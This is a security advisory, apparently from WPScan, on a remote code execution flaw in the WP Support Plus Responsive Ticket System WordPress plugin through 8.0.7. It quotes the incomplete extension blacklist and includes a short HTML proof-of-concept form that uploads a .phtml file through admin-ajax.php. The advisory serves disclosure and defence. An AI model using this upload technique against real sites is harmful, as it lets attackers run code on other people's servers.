WP Support Plus Responsive Ticket System <= 8.0.7 - Remote Code Execution (RCE)

WP Support Plus Responsive Ticket System <= 8.0.7 allows anyone to upload PHP files with extensions like ".phtml", ".php4", ".php5", and so on, all of which are run as if their extension was ".php" on most hosting platforms.

This is because "includes/admin/attachment/uploadAttachment.php" contains this code:

    switch ($extension){
        case 'exe':
        case 'php':
        case 'js':
            $errorMessege=__('Error: file format not supported!','wp-support-plus-responsive-ticket-system');

But it does not check for other extensions like ".phtml". In addition, it saves the file with a predictable name based on the timestamp, and anyone can load the file and run the code it contains.

Plugin author notified 2017-11-09.
Proof of Concept
<form method="post" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">

After doing this, an uploaded file can be accessed at, say:


Affects Plugin


URL https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system


Type RCE
OWASP Top 10 A1: Injection


Submitter Robert Mathews
Submitter Website https://tigertech.net/
Submitter Twitter @TigerTech
Views 3416
Verified No


Publicly Published 2017-11-11 (over 1 year ago)
Added 2017-11-12 (over 1 year ago)
Last Updated 2017-11-12 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.